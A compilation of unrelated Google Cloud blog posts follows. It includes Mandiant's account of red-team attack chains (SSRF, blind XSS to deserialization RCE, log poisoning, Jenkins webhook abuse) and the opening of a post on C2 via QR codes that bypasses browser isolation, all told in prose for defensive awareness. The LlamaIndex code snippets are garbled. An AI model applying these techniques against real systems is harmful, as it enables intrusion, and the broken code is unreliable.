Streamlined AI model development with Vertex AI:
The AFRL wanted to replicate the functionality of university HPC clusters, especially since there was a diversity of users that needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build and much more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to do model development and testing in an accelerated manner.
Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
Figure 1: Initial Compromise statistics from the M-Trends report
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most of the infrastructure typically receive a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the various application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators will perform most of the remaining activities at this point, the AppSec consultants will stay close to the engagement and often engage to further support internal exploitations efforts. For example, applications that are only accessible internally generally get a lot less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve achieved a significant increase of engagements where our Red Team successfully gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.
Figure 2: HTML to PDF Server-Side Request Forgery to deserialization
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application.The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). Apache Software Foundation assigned CVE-2022-46366 for this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Figure 3: Remote code execution staged with blind cross-site scripting
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application brought additional attention upon discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was uniquely distinct, making it highly unlikely to be discovered with conventional directory brute-forcing methods.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
Figure 4: Remote code execution through log file poisoning
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications were redirecting to the customer’s single-sign on (SSO) provider. However, one application had a different behavior. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials of a developer for an enterprise source control application account. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins—an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately in remote code execution, effectively compromising the organization’s CI/CD pipeline.
Figure 5: External perimeter breach via CI/CD SSRF
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edc867b96d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
Building a new Google Cloud region in Querétaro, Mexico is welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
AI agents are revolutionizing the landscape of gen AI application development. Retrieval augmented generation (RAG) has significantly enhanced the capabilities of large language models (LLMs), enabling them to access and leverage external data sources such as databases. This empowers LLMs to generate more informed and contextually relevant responses. Agentic RAG represents a significant leap forward, combining the power of information retrieval with advanced action planning capabilities. AI agents can execute complex tasks that involve multiple steps that reason, plan and make decisions, and then take actions to execute goals over multiple iterations. This opens up new possibilities for automating intricate workflows and processes, leading to increased efficiency and productivity.
LlamaIndex has emerged as a leading framework for building knowledge-driven and agentic systems. It offers a comprehensive suite of tools and functionality that facilitate the development of sophisticated AI agents. Notably, LlamaIndex provides both pre-built agent architectures that can be readily deployed for common use cases, as well as customizable workflows, which enable developers to tailor the behavior of AI agents to their specific requirements.
Today, we’re excited to announce a collaboration with LlamaIndex on open-source integrations for Google Cloud databases including AlloyDB for PostgreSQL and Cloud SQL for PostgreSQL.
These LlamaIndex integrations, available to download via PyPi llama-index-alloydb-pg and llama-index-cloud-sq-pg, empower developers to build agentic applications that can connect with Google databases. The integrations include:
In addition, developers can also access previously published LlamaIndex integrations for Firestore, including for Vector Store and Index Store.
Integration benefits
LlamaIndex supports a broad spectrum of different industry use cases, including agentic RAG, report generation, customer support, SQL agents, and productivity assistants. LlamaIndex’s multi-modal functionality extends to applications like retrieval-augmented image captioning, showcasing its versatility in integrating diverse data types. Through these use cases, joint customers of LlamaIndex and Google Cloud databases can expect to see an enhanced developer experience, complete with:
Streamlined knowledge retrieval: Using these packages makes it easier for developers to build knowledge-retrieval applications with Google databases. Developers can leverage AlloyDB and Cloud SQL vector stores to store and semantically search unstructured data to provide models with richer context. The LlamaIndex vector store integrations let you filter metadata effectively, select from vector similarity strategies, and help improve performance with custom vector indexes.
Complex document parsing: LlamaIndex’s first-class document parser, LlamaParse, converts complex document formats with images, charts and rich tables into a form more easily understood by LLMs; this produces demonstrably better results for LLMs attempting to understand the content of these documents.
Secure authentication and authorization: LlamaIndex integrations to Google databases utilize the principle of least privilege, a best practice, when creating database connection pools, authenticating, and authorizing access to database instances.
Fast prototyping: Developers can quickly build and set up agentic systems with readily available pre-built agent and tool architectures on LlamaHub.
Flow control: For production use cases, LlamaIndex Workflows provide the flexibility to build and deploy complex agentic systems with granular control of conditional execution, as well as powerful state management.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e61ee34f490>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
A report generation use case
Agentic RAG workflows are moving beyond simple question and answer chatbots. Agents can synthesize information from across sources and knowledge bases to generate in-depth reports. Report generation spans across many industries — from legal, where agents can do prework such as research, to financial services, where agents can analyze earning call reports. Agents mimic experts that sift through information to generate insights. And even if agent reasoning and retrieval takes several minutes, automating these reports can save teams several hours.
LlamaIndex provides all the key components to generate reports:
Structured output definitions with the ability to organize outputs into Report templates
Intelligent document parsing to easily extract and chunk text and other media
Knowledge base storage and integration across the customer’s ecosystem
Agentic workflows to define tasks and guide agent reasoning
Now let’s see how these concepts work, and consider how to build a report generation agent that provides daily updates on new research papers about LLMs and RAG.
1. Prepare data: Load and parse documents
The key to any RAG workflow is ensuring a well-created knowledge base. Before you store the data, you need to ensure it is clean and useful. Data for the knowledge bases can come from your enterprise data or other sources. To generate reports for top research articles, developers can use the Arxiv SDK to pull free, open-access publications.
But rather than use the ArxivReader to load and convert articles to plain text, LlamaParse supports varying paper formats, tables, and multimodal media leading to improved accuracy of document parsing.
To improve the knowledge base’s effectiveness, we recommend adding metadata to documents. This allows for advanced filtering or support for additional tooling. Learn more about metadata extraction.
2. Create a knowledge base: storage data for retrieval
Now, the data needs to be saved for long-term use. The LlamaIndexGoogle Cloud database integrations support storage and retrieval of a growing knowledge base.
2.1. Create a secure connection to the AlloyDB or Cloud SQL database
Utilize the AlloyDBEngine class to easily create a shareable connection pool that securely connects to your PostgreSQL instance.
Create only the necessary tables needed for your knowledge base. Creating separate tables reduces the level of access permissions that your agent needs. You can also specify a special “publication_date” metadata column that you can filter on later.
2.2. Customize the underlying storage with the Document Store, Index Store, and Vector Store. For the vector store, specify the metadata field “publication_date” that you created previously.
2.4. Create tools from indexes to be used by the agent.
code_block
<ListValue: [StructValue([(‘code’, ‘search_tool = QueryEngineTool.from_defaults(rn query_engine=index.as_query_engine(),rn description=”Useful for retrieving specific snippets from research publications.”,rn)rnrnsummary_tool = = QueryEngineTool.from_defaults(rn query_engine=summary_tool.as_query_engine(),rn description=”Useful for questions asking questions about research publications.”,rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f070>)])]>
3. Prompt: create an outline for the report
Reports may have requirements on sections and formatting. The agent needs instructions for formatting. Here is an example outline of a report format:
code_block
<ListValue: [StructValue([(‘code’, ‘outline=”””rn# DATE Daily report: TOPICrnrn## Executive Summaryrnrn## Top Challenges / Description of problemsrnrn## Summary of papersrnrn| Title | Authors | Summary | Links |rn| —– | ——- | ——- | —– |rn|LOTUS: Enabling Semantic Queries with LLMs Over Tables of Unstructured and Structured Data | Liana Patel, Siddharth Jha, Carlos Guestrin, Matei Zaharia | … | https://arxiv.org/abs/2407.11418v1 |rn”””‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fdf0>)])]>
4. Define the workflow: outline agentic steps
Next, you define the workflow to guide the agent’s actions. For this example workflow, the agent tries to reason what tool to call: summary tools or the vector search tool. Once the agent has reasoned it doesn’t need additional data, it can exit out of the research loop to generate a report.
LlamaIndex Workflows provides an easy to use SDK to build any type of workflow:
Now that you’ve set up a knowledge base and defined an agent, you can set up automation to generate a report!
code_block
<ListValue: [StructValue([(‘code’, ‘query = “What are the recently published RAG techniques”rnreport = await agent.run(query=query)rnrn# Save the reportrnwith open(“report.md”, “w”) as f:rn f.write(report[‘response’])’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fa90>)])]>
There you have it! A complete report that summarizes recent research in LLM and RAG techniques. How easy was that?
Get started today
In short, these LlamaIndex integrations with Google Cloud databases enables application developers to leverage the data in their operational databases to easily build complex agentic RAG workflows. This collaboration supports Google Cloud’s long-term commitment to be an open, integrated, and innovative database platform. With LlamaIndex’s extensive user base, this integration further expands the possibilities for developers to create cutting-edge, knowledge-driven AI agents.
Ready to get started? Take a look at the following Notebook-based tutorials:
Browser isolation is a security technology where web browsing activity is separated from the user’s local device by running the browser in a secure environment, such as a cloud server or a virtual machine, and then streaming the visual content to the user’s device.
Browser isolation is often used by organizations to combat phishing threats, protect the device from browser-delivered attacks, and deter typical command-and-control (C2 or C&C) tactics used by attackers.
In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device.
Background on Browser Isolation
The great folks at SpecterOps released a blog post earlier this year on browser isolation and how penetration testers and red team operators may work around browser isolation scenarios for ingress tool transfer, egress data transfer, and general bypass techniques. In summary, browser isolation protects users from web-based attacks by sandboxing the web browser in a secure environment (either local or remote) and streaming the visual content back to the user’s local browser. The experience is (ideally) fully transparent to the end user. According to most documentation, three types of browser isolation exist:
Remote browser isolation (RBI), the most secure and the most common variant, sandboxes the browser in a cloud-based environment.
On-premises browser isolation is similar to RBI but runs the sandboxed browser on-premises. The advantage of this approach is that on-premises web-based applications can be accessed without requiring complex cloud-to-on-premises connectivity.
Local browser isolation, or client-side browser isolation, runs the sandboxed browser in a local containerized or virtual machine environment ( e.g., Docker or Windows Sandbox).
The remote browser handles everything from page rendering to executing JavaScript. Only the visual appearance of the web page is sent back to the user’s local browser (a stream of pixels). Keypresses and clicks in the local browser are forwarded to the remote browser, allowing the user to interact with the web application. Organizations often use proxies to ensure all web traffic is served through the browser isolation technology, thereby limiting egress network traffic and restricting an attacker’s ability to bypass the browser isolation.
SpecterOps detailed some of the challenges that offensive security professionals face when operating in browser isolation environments. They document possible approaches on how to circumvent browser isolation by abusing misconfigurations, such as using HTTP headers, cookies, or authentication parameters to bypass the isolation features.
Command and control (C2 or C&C) refers to an attacker’s ability to remotely control compromised systems via malicious implants. The most common channel to send commands to and from a victim device is through HTTP requests:
The implant requests a command from the attacker-controlled C2 server through an HTTP request (e.g., in the HTTP parameters, headers, or request body).
The C2 server returns the command to execute in the HTTP response (e.g., in headers or response body).
The implant decodes the HTTP response and executes the command.
The implant submits the command output back to the C2 server with another HTTP request.
The implant “sleeps” for a while, then repeats the cycle.
However, this approach presents challenges when browser isolation is in use—when making HTTP requests through a browser isolation system, the HTTP response returned to the local browser only contains the streaming engine to render the remote browser’s visual page contents. The original HTTP response (from the web server) is only available in the remote browser. The HTTP response is rendered in the remote browser, and only a stream of pixels is sent to the local browser to visually render the web page. This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response (step 3).
Figure 1: Sequence diagram of browser isolation HTTP request lifecycle
In this blog post, we will explore a different approach to achieving C2 with compromised systems in browser isolation environments, working entirely within the browser isolation context.
Sending C2 Data Through Pixels
Mandiant’s Red Team developed a novel solution to this problem. Instead of returning the C2 data in the HTTP request headers or body, the C2 server returns a valid web page that visually shows a QR code. The implant then uses a local headless browser (e.g., using Selenium) to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data. By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the web page is rendered in a remote browser.
Figure 2: Sequence diagram of C2 via QR codes
